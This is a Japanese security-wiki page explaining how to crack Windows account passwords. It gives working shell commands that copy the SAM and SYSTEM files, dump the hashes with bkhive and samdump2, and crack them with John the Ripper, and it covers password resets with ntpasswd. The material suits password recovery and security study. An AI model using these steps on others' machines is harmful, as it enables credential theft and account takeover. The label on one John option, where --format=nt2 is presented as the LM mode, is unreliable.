Windowsアカウントのパスワードをクラッキングする方法

提供: セキュリティ
2015年9月22日 (火) 15:44時点におけるDaemon (トーク | 投稿記録)による版

(差分) ←前の版 | 最新版 (差分) | 次の版→ (差分)
移動: 案内検索
スポンサーリンク

Windowsからパスワードハッシュを抜き出し、パスワードクラックする手法を説明します。

概要

Windowsパスワード については、 Windowsのパスワード をご参照ください。

Active Directoryを使用していない場合、Windows アカウントのパスワードは、 SAMデータベース と呼ばれる C:\Windows\System32\config\SAM ファイルに暗号化されて格納されています。

Windows アカウントのパスワードをクラッキングする方法は、いくつか存在します。

パスワードクラック以外の方法は、以下の方法があります。

  • パスワードリセット

メモリの中のNTLMハッシュ/LMハッシュを入手する方法には、以下の方法があります。

SAMデータベースのクラッキング

Windows で SAMデータベースを抜き出す

以下のツールを用いて、パスワードハッシュを入手できます。

LinuxでSAMデータベースを抜き出す

以下は、bkhivesamdump2 を用いて、パスワードハッシュを取得する方法です。

mkdir /mnt/windows
mount /dev/hda1 /mnt/windows
cd /mnt/windows/WINDOWS/system32/config
cp SAM ~/
cp system ~/
cd ~/
bkhive system key
samdump2 ./system ./SAM > hashes.txt

パスワードハッシュのクラッキング

John the Ripper

LMハッシュNTLMハッシュのどちらのモードで動かすか、指定しないと警告が出て、自動的に選択されます。

$ john hashes.txt
Warning: detected hash type "lm", but the string is also recognized as "nt"
Use the "--format=nt" option to force loading these as that type instead
Warning: detected hash type "lm", but the string is also recognized as "nt2"
Use the "--format=nt2" option to force loading these as that type instead
Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2-16])

NTLMハッシュを指定する場合。

$ john --format=nt hashes.txt
Loaded 6 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
XXXX             (Administrator)

LMハッシュを指定する場合。

$ john --format=nt2 hashes.txt
Loaded 6 password hashes with no different salts (NT v2 [SSE2i 12x])
Remaining 2 password hashes with no different salts

パスワードリセットを用いる

WindowsSAMデータベース を削除した場合、パスワードが空の SAMデータベース が自動的に作成されます。 ただし、自動的に作成されるのは デフォルトアカウントの Administrator と Guest だけです。

ntpasswd を用いることで、既存のアカウントのパスワードをリセットや再設定が可能です。

関連項目




スポンサーリンク